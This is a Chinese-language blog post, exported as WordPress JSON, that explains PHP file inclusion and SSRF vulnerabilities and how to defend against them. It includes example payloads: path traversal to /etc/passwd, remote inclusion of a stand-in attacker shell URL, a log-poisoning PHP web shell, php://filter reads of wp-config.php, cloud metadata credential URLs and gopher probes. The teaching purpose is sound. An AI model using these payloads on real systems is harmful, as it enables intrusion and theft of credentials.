{"id":641,"date":"2025-12-08T19:59:05","date_gmt":"2025-12-08T11:59:05","guid":{"rendered":"https:\/\/www.52runoob.com\/?p=641"},"modified":"2025-12-08T19:59:05","modified_gmt":"2025-12-08T11:59:05","slug":"php%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e4%b9%8b%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e4%b8%8essrf%e6%94%bb%e5%87%bb%e5%85%a8%e8%a7%a3%e6%9e%90","status":"publish","type":"post","link":"https:\/\/www.52runoob.com\/index.php\/2025\/12\/08\/php%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e4%b9%8b%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e4%b8%8essrf%e6%94%bb%e5%87%bb%e5%85%a8%e8%a7%a3%e6%9e%90\/","title":{"rendered":"PHP\u5b89\u5168\u6f0f\u6d1e\u4e4b\u6587\u4ef6\u5305\u542b\u4e0eSSRF\u653b\u51fb\u5168\u89e3\u6790"},"content":{"rendered":"\n<p>\u4e0b\u9762\u662f\u4e00\u4efd\u9762\u5411\u5f00\u53d1\u8005\u548c\u5b89\u5168\u5de5\u7a0b\u5e08\u7684\u6df1\u5165\u6307\u5357\uff0c\u8986\u76d6&nbsp;<strong>PHP \u4e2d\u7684\u6587\u4ef6\u5305\u542b\uff08LFI\/RFI\/\u5305\u542b\u94fe\uff09\u4e0e SSRF\uff08\u670d\u52a1\u5668\u7aef\u8bf7\u6c42\u4f2a\u9020\uff09<\/strong>\uff1a\u6982\u5ff5\u3001\u5e38\u89c1\u5229\u7528\u94fe\u3001\u68c0\u6d4b\u65b9\u6cd5\u3001\u8be6\u7ec6\u7f13\u89e3\u63aa\u65bd\u3001\u4ee3\u7801\u7ea7\u5b89\u5168\u5b9e\u8df5\u3001\u8fd0\u7ef4\/\u7f51\u7edc\u9632\u62a4\u4e0e\u590d\u73b0\/\u6d4b\u8bd5\u6280\u5de7\u3002\u613f\u8fd9\u4efd\u6307\u5357\u80fd\u5f53\u6210\u4f60\u67e5\u6f0f\u6d1e\u3001\u4fee\u6f0f\u6d1e\u4e0e\u5199\u5b89\u5168\u4ee3\u7801\u65f6\u7684\u201c\u6d3b\u624b\u518c\u201d\u3002<\/p>\n\n\n\n<p>\u6211\u628a\u5185\u5bb9\u5206\u6210\u51e0\u4e2a\u6e05\u6670\u6a21\u5757\uff1a\u6982\u5ff5\u4e0e\u5371\u5bb3\u3001\u5178\u578b\u6f0f\u6d1e\u793a\u4f8b\uff08\u6613\u88ab\u5ffd\u89c6\u7684\u53d8\u4f53\uff09\u3001\u5229\u7528\u6280\u5de7\uff08LFI\u2192RCE\u3001SSRF\u2192\u5185\u7f51\/\u5143\u6570\u636e\u6e17\u900f\u7b49\uff09\u3001\u68c0\u6d4b\/\u590d\u73b0\u65b9\u5f0f\u3001\u4ee3\u7801\u7ea7\u9632\u62a4\u4e0e\u6700\u4f73\u5b9e\u8df5\u3001\u8fd0\u7ef4\/\u7f51\u7edc\u9632\u62a4\u3001\u68c0\u6d4b\u5de5\u5177\u4e0eCI\u96c6\u6210\u3001\u54cd\u5e94\u4e0e\u8865\u6551\u3002\u6bcf\u4e00\u8282\u90fd\u7ed9\u51fa\u53ef\u590d\u5236\u7684\u4ee3\u7801\u7247\u6bb5\u4e0e\u5177\u4f53\u914d\u7f6e\u5efa\u8bae\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e00\u3001\u57fa\u7840\u6982\u5ff5\u4e0e\u5371\u5bb3\u6982\u89c8<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u6587\u4ef6\u5305\u542b\uff08File Inclusion\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>LFI\uff08Local File Inclusion\uff09<\/strong>\uff1a\u5e94\u7528\u628a\u7528\u6237\u8f93\u5165\u7528\u4f5c\u6587\u4ef6\u8def\u5f84\u5e76\u901a\u8fc7\u00a0<code>include<\/code>\/<code>require<\/code>\u00a0\u7b49\u5728\u672c\u5730\u5305\u542b\u6267\u884c\uff0c\u653b\u51fb\u8005\u80fd\u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\uff0c\u751a\u81f3\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\u6267\u884c\u4ee3\u7801\uff08log poisoning\u3001phar \u534f\u8bae\u7b49\uff09\u3002<\/li>\n\n\n\n<li><strong>RFI\uff08Remote File Inclusion\uff09<\/strong>\uff1a\u5f53\u00a0<code>allow_url_include=On<\/code>\u00a0\u4e14\u672a\u8fc7\u6ee4\u7528\u6237\u8f93\u5165\u65f6\uff0c\u7528\u6237\u80fd\u7528\u8fdc\u7a0b URL\uff08http:\/\/\u2026\/shell.php\uff09\u88ab\u5305\u542b\u5e76\u6267\u884c\u2014\u2014\u6781\u5176\u5371\u9669\uff08RCE\uff09\u3002<\/li>\n\n\n\n<li>\u76f8\u5173 PHP \u51fd\u6570\/\u8bed\u6cd5\uff1a<code>include<\/code>,\u00a0<code>require<\/code>,\u00a0<code>include_once<\/code>,\u00a0<code>require_once<\/code>,\u00a0<code>file_get_contents<\/code>,\u00a0<code>fopen<\/code>,\u00a0<code>readfile<\/code>,\u00a0<code>file_put_contents<\/code>,\u00a0<code>fopen_streams<\/code>,\u00a0<code>stream_wrapper_register<\/code>\u00a0\u7b49\u90fd\u53ef\u88ab\u8bef\u7528\u5f15\u53d1\u95ee\u9898\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u5371\u5bb3<\/strong>\uff1a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u3001\u654f\u611f\u4fe1\u606f\u6cc4\u9732\uff08\u914d\u7f6e\u3001\u79c1\u94a5\uff09\u3001\u547d\u4ee4\u6267\u884c\u3001\u6301\u4e45\u540e\u95e8\u6ce8\u5165\u3001\u6a2a\u5411\u6269\u5c55\uff08\u653b\u51fb\u5176\u4ed6\u4e3b\u673a\uff09\u7b49\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SSRF\uff08Server-Side Request Forgery\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u540e\u7aef\u670d\u52a1\u5668\u66ff\u5ba2\u6237\u7aef\u53d1\u8d77 HTTP\u3001TCP\u3001UDP \u7b49\u8bf7\u6c42\u65f6\uff0c\u5982\u679c\u76ee\u6807\u5730\u5740\u53ef\u7531\u4e0d\u53ef\u4fe1\u8f93\u5165\u63a7\u5236\uff0c\u5219\u4f1a\u53d1\u751f SSRF\u3002<\/li>\n\n\n\n<li>\u653b\u51fb\u8005\u53ef\u8bbf\u95ee\u5185\u7f51\u670d\u52a1\uff08127.0.0.1:80\uff09\u3001\u4e91\u5382\u5546\u5143\u6570\u636e\u670d\u52a1\uff08AWS 169.254.169.254\u3001GCP metadata server\uff09\u3001\u6216\u89e6\u53d1\u5bf9\u5916\u90e8\u56de\u8fde\uff08\u7528\u4e8e\u6570\u636e\u7a83\u53d6\/SSRF\u2192RCE \u94fe\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<p><strong>\u5371\u5bb3<\/strong>\uff1a\u5185\u7f51\u7aef\u53e3\u626b\u63cf\u3001\u654f\u611f\u63a5\u53e3\u8bbf\u95ee\uff08Redis\u3001Elasticsearch\u3001Kubernetes API\uff09\u3001\u5143\u6570\u636e\u6cc4\u9732\uff08\u56de\u4f20 token\/credentials\uff09\u3001\u8fdc\u7a0b\u8bf7\u6c42\u6253\u70b9\uff08\u7528\u4e8e CSRF \u63a9\u76d6\uff09\u7b49\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e8c\u3001\u5178\u578b\u6f0f\u6d1e\u793a\u4f8b\u4e0e\u5229\u7528\u94fe\uff08\u5305\u542b\u7ec6\u8282\uff09<\/h1>\n\n\n\n<p>\u4e0b\u9762\u662f\u4e00\u4e9b\u5e38\u89c1\u6613\u51fa\u9519\u7684\u7247\u6bb5\u4e0e\u5982\u4f55\u88ab\u5229\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1) \u76f4\u63a5\u5305\u542b\u7528\u6237\u8f93\u5165\uff08\u5371\u9669\u793a\u4f8b\uff09<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n\/\/ BAD\n$page = $_GET&#x5B;&#039;page&#039;];\ninclude &quot;\/var\/www\/html\/pages\/$page.php&quot;;\n\n<\/pre><\/div>\n\n\n<p>\u82e5&nbsp;<code>page=..\/..\/..\/..\/etc\/passwd%00<\/code>\uff08\u5386\u53f2\u4e0a null byte\u53ef\u7ed5\u8fc7\uff09\uff0c\u6216&nbsp;<code>page=http:\/\/attacker\/shell<\/code>\uff08\u82e5 allow_url_include=On\uff09\uff0c\u5c31\u4f1a\u88ab\u5229\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2) file_get_contents \u7528\u4e8e\u8bfb\u53d6\u7528\u6237\u6307\u5b9a URL\uff08SSRF\uff09<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$url = $_GET&#x5B;&#039;url&#039;];\n$data = file_get_contents($url); \/\/ SSRF \u53ef\u63a7\n\n<\/pre><\/div>\n\n\n<p>\u82e5&nbsp;<code>url=http:\/\/169.254.169.254\/latest\/meta-data\/<\/code>\uff0c\u5373\u53ef\u6cc4\u9732\u5143\u6570\u636e\u3002\u6216\u8005\u4f7f\u7528&nbsp;<code>gopher:\/\/<\/code>&nbsp;\u53ef\u89e6\u53d1\u590d\u6742 TCP \u4ea4\u4e92\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3) log poisoning\uff08LFI \u2192 RCE\uff09<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u653b\u51fb\u6d41\u7a0b\uff1a\u5b58\u5728 LFI \u80fd\u8bfb\u53d6\u65e5\u5fd7\u5e76\u5305\u542b\u65e5\u5fd7 \u2192 \u653b\u51fb\u8005\u628a PHP \u4ee3\u7801\u6ce8\u5165\u65e5\u5fd7\uff08User-Agent\u3001Referer\u3001POST body\uff09 \u2192 \u5305\u542b\u6267\u884c \u2192 RCE\u3002<\/li>\n\n\n\n<li>\u793a\u4f8b\uff1a<code>include '\/var\/log\/nginx\/access.log';<\/code>\u00a0\u4f46\u82e5\u00a0<code>access.log<\/code>\u00a0\u53ef\u5199\u5e76\u5305\u542b\u00a0<code>&lt;?php system($_GET[\"cmd\"]); ?><\/code>\uff0c\u5219\u53ef\u8fdc\u7a0b\u6267\u884c\u3002<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">4) phar:\/\/ \u5229\u7528\uff08\u53cd\u5e8f\u5217\u5316\u94fe\uff09<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>include 'phar:\/\/path\/to\/file.phar';<\/code>\u00a0\u53ef\u89e6\u53d1 PHAR \u5143\u6570\u636e\u4e2d\u00a0<code>__destruct<\/code>\uff0c\u7ed3\u5408\u4e0d\u5b89\u5168\u7684\u53cd\u5e8f\u5217\u5316\u53ef\u8fbe RCE\u3002<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">5) php:\/\/filter \u7ed5\u8fc7<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code>\u00a0\u53ef\u8bfb\u53d6\u6e90\u7801\u5e76 base64 \u7f16\u7801\u7ed5\u8fc7\u67d0\u4e9b\u8fc7\u6ee4\u5668\uff1a<code>include 'php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/wp-config.php';<\/code><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">6) SSRF \u5bf9\u4e91\u5143\u6570\u636e\u670d\u52a1\u7684\u653b\u51fb<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AWS v1 (IMDSv1) \u4e0e IMDSv2 \u5dee\u522b\uff1aIMDSv2 \u9700\u8981 token\u3002\u82e5\u670d\u52a1\u7aef\u4f7f\u7528 IMDSv1\uff0c\u653b\u51fb\u8005\u53ef\u901a\u8fc7 SSRF \u8bfb\u53d6\u654f\u611f credentials\u3002<\/li>\n\n\n\n<li>\u5e38\u89c1\u76ee\u6807\u5730\u5740\uff1a<code>http:\/\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/<\/code><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e09\u3001\u68c0\u6d4b\u4e0e\u590d\u73b0\uff08\u6d4b\u8bd5\u6280\u5de7\uff09<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u88ab\u52a8\u4e0e\u4e3b\u52a8\u68c0\u6d4b<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u88ab\u52a8<\/strong>\uff1a\u5ba1\u8ba1\u4ee3\u7801\u8def\u5f84\uff0c\u67e5\u627e\u00a0<code>include<\/code>,\u00a0<code>require<\/code>,\u00a0<code>file_get_contents<\/code>,\u00a0<code>fopen<\/code>,\u00a0<code>curl_exec<\/code>,\u00a0<code>fsockopen<\/code>,\u00a0<code>stream_socket_client<\/code>,\u00a0<code>stream_get_contents<\/code>,\u00a0<code>socket_*<\/code>\uff0c\u5e76\u68c0\u67e5\u662f\u5426\u4f7f\u7528\u672a\u8fc7\u6ee4\u7684\u5916\u90e8\u8f93\u5165\uff08$_GET\/$_POST\/HTTP headers\uff09\u3002<\/li>\n\n\n\n<li><strong>\u4e3b\u52a8<\/strong>\uff1a\u5bf9\u5916\u90e8\u63a5\u53e3\u6ce8\u5165 payloads\uff1a\n<ul class=\"wp-block-list\">\n<li>LFI \u5217\u8868\uff1a\u00a0<code>..\/..\/..\/..\/etc\/passwd<\/code>,\u00a0<code>..\/..\/..\/..\/proc\/self\/environ<\/code>,\u00a0<code>\/var\/log\/apache2\/access.log<\/code><\/li>\n\n\n\n<li>php:\/\/filter\uff1a<code>php:\/\/filter\/convert.base64-encode\/resource=...<\/code><\/li>\n\n\n\n<li>SSRF \u5217\u8868\uff1a\u00a0<code>http:\/\/127.0.0.1:80\/<\/code>,\u00a0<code>http:\/\/169.254.169.254\/<\/code>,\u00a0<code>gopher:\/\/127.0.0.1:22\/_\u2026<\/code>,\u00a0<code>http:\/\/[::1]\/<\/code>\u00a0\u7b49<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u6d4b\u8bd5\u5de5\u5177<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Burp Suite + Repeater + Collaborator\/Interactsh\uff08\u68c0\u6d4b\u5916\u62e8\u3001DNS\uff09<\/li>\n\n\n\n<li>curl\/HTTPie + \u81ea\u5efa\u56de\u8fde\u670d\u52a1\u5668\uff08ngrok \/ httpbin \/ interactsh\uff09<\/li>\n\n\n\n<li>Nuclei \/ naabu \/ ffuf \/ sqlmap\uff08\u63d2\u4ef6\u6216\u6a21\u677f\u5e93\u91cc\u6709 LFI\/SSRF \u6a21\u677f\uff09<\/li>\n\n\n\n<li>\u68c0\u6d4b\u5185\u7f51\uff1a\u5229\u7528 DNS \u56de\u8c03\u670d\u52a1\uff08dnslog.cn\u3001interact.sh\u3001Burp Collaborator\uff09<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">SSRF \u53ef\u7528\u7684\u68c0\u6d4b payloads\uff08\u793a\u4f8b\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>http:\/\/127.0.0.1\/<\/code><\/li>\n\n\n\n<li><code>http:\/\/127.0.0.1:22\/<\/code>\uff08\u68c0\u6d4b\u7aef\u53e3\uff09<\/li>\n\n\n\n<li><code>http:\/\/169.254.169.254\/latest\/meta-data\/<\/code><\/li>\n\n\n\n<li><code>gopher:\/\/127.0.0.1:11211\/_...<\/code>\uff08memcached \u5229\u7528\uff09<\/li>\n\n\n\n<li><code>file:\/\/\/etc\/passwd<\/code>\uff08\u67d0\u4e9b\u51fd\u6570\u652f\u6301 file:\/\/\uff09<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u56db\u3001\u4ee3\u7801\u7ea7\u9632\u62a4\u4e0e\u5b89\u5168\u5b9e\u8df5\uff08\u6700\u91cd\u8981\uff09<\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6838\u5fc3\u539f\u5219\uff1a<strong>\u4e0d\u8981\u628a\u539f\u59cb\u7528\u6237\u8f93\u5165\u4f20\u5165\u6587\u4ef6\u8bfb\u53d6\/\u5305\u542b\/\u7f51\u7edc\u8bf7\u6c42\u51fd\u6570<\/strong>\u3002\u603b\u662f\u4f7f\u7528\u663e\u5f0f\u767d\u540d\u5355\u3001\u6700\u5c0f\u6743\u9650\u3001\u8def\u5f84\u5f52\u4e00\u5316\u4e0e\u68c0\u67e5\u3002<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">1) \u6c38\u4e0d\u76f4\u63a5\u5305\u542b\u7528\u6237\u8f93\u5165<\/h2>\n\n\n\n<p><strong>\u574f<\/strong>\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ninclude $_GET&#x5B;&#039;tpl&#039;]; \/\/ \u7edd\u5bf9\u7981\u6b62\n\n<\/pre><\/div>\n\n\n<p><strong>\u597d\uff08\u767d\u540d\u5355\u6620\u5c04\uff09<\/strong>\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$pages = &#x5B;\n    &#039;home&#039; =&gt; &#039;\/var\/www\/html\/pages\/home.php&#039;,\n    &#039;about&#039; =&gt; &#039;\/var\/www\/html\/pages\/about.php&#039;,\n];\n\n$key = $_GET&#x5B;&#039;page&#039;] ?? &#039;home&#039;;\nif (!array_key_exists($key, $pages)) {\n    http_response_code(404); exit;\n}\ninclude $pages&#x5B;$key];\n\n<\/pre><\/div>\n\n\n<p>\u53ea\u5141\u8bb8\u9884\u5b9a\u4e49\u7684\u952e\u540d\uff0c\u4e0d\u63a5\u53d7\u4efb\u610f\u8def\u5f84\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">2) \u4f7f\u7528 realpath \u4e0e\u76ee\u5f55\u68c0\u6d4b\uff08\u9632\u6b62\u76ee\u5f55\u7a7f\u8d8a\uff09<\/h2>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$base = &#039;\/var\/www\/html\/pages\/&#039;;\n$path = realpath($base . $user_input);\nif ($path === false || strpos($path, $base) !== 0) {\n    throw new Exception(&#039;Invalid path&#039;);\n}\ninclude $path;\n\n<\/pre><\/div>\n\n\n<p>\u6ce8\u610f\uff1a<code>realpath<\/code>&nbsp;\u4f1a\u89e3\u6790\u7b26\u53f7\u94fe\u63a5\uff1b\u4e5f\u8981\u786e\u4fdd&nbsp;<code>$base<\/code>&nbsp;\u672b\u5c3e\u5904\u7406\u4e00\u81f4\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">3) \u7981\u7528\u8fdc\u7a0b\u5305\u542b<\/h2>\n\n\n\n<p>\u5728&nbsp;<code>php.ini<\/code>\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nallow_url_include = Off\nallow_url_fopen = Off   ; \u82e5\u771f\u7684\u4e0d\u9700\u8981\u8fdc\u7a0b\u8bbf\u95ee\uff0c\u53ef\u5173\u6389\n\n<\/pre><\/div>\n\n\n<p><code>allow_url_include=Off<\/code>&nbsp;\u53ef\u9632\u6b62&nbsp;<code>include 'http:\/\/...'<\/code>\u3002<code>allow_url_fopen<\/code>&nbsp;\u5f71\u54cd file_get_contents \u7b49\uff1b\u82e5\u4e0d\u9700\u8981\uff0c\u5efa\u8bae\u4e5f\u5173\u95ed\uff0c\u4f46\u90e8\u5206\u5e94\u7528\u53ef\u80fd\u9700\u8981\u5f00\u542f\uff08\u9700\u8981\u8bc4\u4f30\uff09\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">4) \u5bf9\u6240\u6709\u7f51\u7edc\u8bf7\u6c42\u4f7f\u7528\u767d\u540d\u5355\u4e0e\u7aef\u53e3\u68c0\u67e5\uff08SSRF\uff09<\/h2>\n\n\n\n<p>\u4e0d\u8981\u628a\u7528\u6237\u63d0\u4f9b\u7684 URL \u76f4\u63a5\u4f20\u7ed9&nbsp;<code>file_get_contents<\/code>&nbsp;\u6216 curl\u3002\u505a\u4e24\u5c42\u9632\u62a4\uff1a<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">a) URL \u89e3\u6790\u4e0e IP \u89e3\u6790<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$u = parse_url($url);\nif (!in_array($u&#x5B;&#039;scheme&#039;], &#x5B;&#039;http&#039;,&#039;https&#039;])) { throw ...; } \/\/ \u963b\u6b62 file:\/\/ gopher:\/\/ \u7b49\n$host = $u&#x5B;&#039;host&#039;];\n$ips = dns_get_record($host, DNS_A + DNS_AAAA);\nif (empty($ips)) throw ...;\n\/\/ \u89e3\u6790\u9996\u4e2a IP\n$ip = $ips&#x5B;0]&#x5B;&#039;ip&#039;] ?? $ips&#x5B;0]&#x5B;&#039;ipv6&#039;] ?? null;\nif (!$ip) throw ...;\n\/\/ \u5224\u65ad\u662f\u5426\u5728\u79c1\u6709\u7f51\u6bb5\nfunction is_private_ip($ip) { \/* implement RFC1918, ::1, link-local, 169.254.169.254\u7b49 *\/ }\nif (is_private_ip($ip)) throw new Exception(&#039;disallowed&#039;);\n\n<\/pre><\/div>\n\n\n<p>\u6ce8\u610f\uff1a\u653b\u51fb\u8005\u53ef\u901a\u8fc7 DNS rebinding \u6216\u901a\u8fc7\u77ed\u65f6\u95f4\u5207\u6362 DNS \u6307\u5411\u5185\u7f51\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002\u8fdb\u4e00\u6b65\u63a8\u8350\u4f7f\u7528<strong>\u76f4\u63a5\u7981\u6b62\u76ee\u6807\u4e3a\u79c1\u6709 IP \u7684 egress<\/strong>\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">b) \u4f7f\u7528\u4ee3\u7406\/\u7f51\u5173\u8fdb\u884c\u7edf\u4e00\u8bbf\u95ee<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8ba9\u540e\u7aef\u8bf7\u6c42\u53ea\u80fd\u901a\u8fc7\u53ef\u4fe1\u7684 HTTP \u4ee3\u7406\uff08\u5185\u90e8\u4ee3\u7406\u6267\u884c\u5916\u90e8\u8bbf\u95ee\u5e76\u505a\u4e25\u683c\u68c0\u67e5\uff09\uff0c\u5e76\u901a\u8fc7\u6b64\u4ee3\u7406\u5b9e\u73b0\u767d\u540d\u5355\u3002<\/li>\n\n\n\n<li>\u6216\u4f7f\u7528 egress firewall + proxy + allowlist\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">5) \u5bf9\u6d41\u5305\u88c5\u5668\u505a\u9650\u5236<\/h2>\n\n\n\n<p>PHP \u652f\u6301\u5f88\u591a\u6d41\u5305\u88c5\u5668\uff08<code>php:\/\/<\/code>,&nbsp;<code>zip:\/\/<\/code>,&nbsp;<code>phar:\/\/<\/code>,&nbsp;<code>data:\/\/<\/code>,&nbsp;<code>expect:\/\/<\/code>,&nbsp;<code>gopher:\/\/<\/code>&nbsp;\u7b49\uff09\u3002\u8bb8\u591a\u5229\u7528\u4f9d\u8d56\u4e8e\u8fd9\u4e9b\u5305\u88c5\u5668\u3002<strong>\u5c3d\u91cf\u7981\u7528\u4e0d\u9700\u8981\u7684\u5305\u88c5\u5668\u6216\u5728\u914d\u7f6e\u4e2d\u9650\u5236<\/strong>\u3002\u4f8b\u5982\u5728&nbsp;<code>allow_url_fopen<\/code>&nbsp;\u5173\u95ed\u65f6\uff0c\u4e5f\u53ef\u4ee5\u5728\u4ee3\u7801\u4e2d\u68c0\u6d4b Scheme\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">6) \u6587\u4ef6\u4e0a\u4f20\u4e0e\u6587\u4ef6\u5305\u542b\u4ea4\u4e92\uff08\u975e\u5e38\u5e38\u89c1\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e0a\u4f20\u6587\u4ef6<strong>\u5b58\u653e\u5728 webroot \u4ee5\u5916<\/strong>\uff08\u5982\u00a0<code>\/var\/uploads<\/code>\uff09\uff0c\u5e76\u4e14 webserver \u5bf9\u8be5\u76ee\u5f55\u7981\u6b62\u6267\u884c PHP\u3002<\/li>\n\n\n\n<li>\u968f\u673a\u4e0d\u542b\u7528\u6237\u8f93\u5165\u7684\u6587\u4ef6\u540d\uff08\u5982 UUID\uff09\uff0c\u4e0d\u8981\u4f7f\u7528\u7528\u6237\u539f\u6587\u4ef6\u540d\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e0a\u4f20\u6587\u4ef6\u505a\u6587\u4ef6\u7c7b\u578b\u68c0\u67e5\uff08MIME \u4e0e\u9b54\u672f\u5934\uff09\uff0c\u4f46\u4e0d\u8981\u4ec5\u4f9d\u8d56\u5ba2\u6237\u7aef MIME\u3002<\/li>\n\n\n\n<li>\u63d2\u4ef6\/\u4e3b\u9898\u6587\u4ef6\u5939\u4e0d\u53ef\u5199\u7ed9\u666e\u901a\u7528\u6237\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u793a\u4f8b\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$dst = &#039;\/var\/www\/uploads\/&#039; . bin2hex(random_bytes(16)) . &#039;.&#039; . $ext;\nmove_uploaded_file($_FILES&#x5B;&#039;f&#039;]&#x5B;&#039;tmp_name&#039;], $dst);\n\/\/ \u8bbe\u7f6e chmod 0644\uff0c\u4e14 nginx \u7981\u6b62\u5728\u8be5\u76ee\u5f55\u6267\u884c php\n\n<\/pre><\/div>\n\n\n<p>nginx \u914d\u7f6e\u793a\u4f8b\uff08\u7981\u6b62 PHP \u6267\u884c\uff09\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nlocation \/uploads\/ {\n    location ~ \\.php$ { return 404; }\n    # \u6216 root \u6307\u5411 uploads \u76ee\u5f55\u4e14\u6ca1\u6709 php-fpm fastcgi_pass\n}\n\n<\/pre><\/div>\n\n\n<h2 class=\"wp-block-heading\">7) \u9632\u6b62\u65e5\u5fd7\u6ce8\u5165 \/ log poisoning<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e0d\u628a\u7528\u6237\u539f\u59cb\u8f93\u5165\u5199\u8fdb\u53ef\u88ab include \u7684\u65e5\u5fd7\u6587\u4ef6\uff1b\u628a\u65e5\u5fd7\u5b58\u5728\u5b89\u5168\u4f4d\u7f6e\uff0c\u6216\u5199\u6570\u636e\u5e93\u800c\u975e web \u53ef\u8bfb\u6587\u4ef6\u3002<\/li>\n\n\n\n<li>\u7981\u6b62\u5c06\u65e5\u5fd7\u6587\u4ef6\u66b4\u9732\u5230 webroot\u3002<\/li>\n\n\n\n<li>\u5728\u5199\u5165\u65e5\u5fd7\u65f6\u5bf9\u53ef\u63a7\u8f93\u5165\u505a\u7f16\u7801\uff1a\u4e0d\u8981\u5199\u5165\u00a0<code>&lt;?php<\/code>\u00a0\u7b49\u5b57\u7b26\u4e32\uff0c\u6216\u66ff\u6362\u00a0<code>&lt;<\/code>\/<code>><\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">8) \u5bf9&nbsp;<code>unserialize()<\/code>&nbsp;\u8fdb\u884c\u9650\u5236\uff08\u4e0e\u6587\u4ef6\u5305\u542b\/SSRF \u7ec4\u5408\u5229\u7528\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53cd\u5e8f\u5217\u5316\u65f6\u6307\u5b9a\u00a0<code>allowed_classes<\/code>\uff1a<code>unserialize($data, ['allowed_classes' => false])<\/code>\u00a0\u6216\u767d\u540d\u5355\u7c7b\u3002<\/li>\n\n\n\n<li>\u907f\u514d\u76f4\u63a5\u00a0<code>unserialize()<\/code>\u00a0\u6765\u81ea\u4e0d\u53ef\u4fe1\u6765\u6e90\u7684\u6570\u636e\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">9) \u4f7f\u7528\u5e93\u4e0e\u51fd\u6570\u7684\u5b89\u5168\u66ff\u4ee3<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u4e0d\u8981<\/strong>\u7528\u00a0<code>include<\/code>\u00a0\u52a0\u8f7d\u8fdc\u7a0b URL\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e HTTP \u8bf7\u6c42\uff0c\u4f7f\u7528 cURL 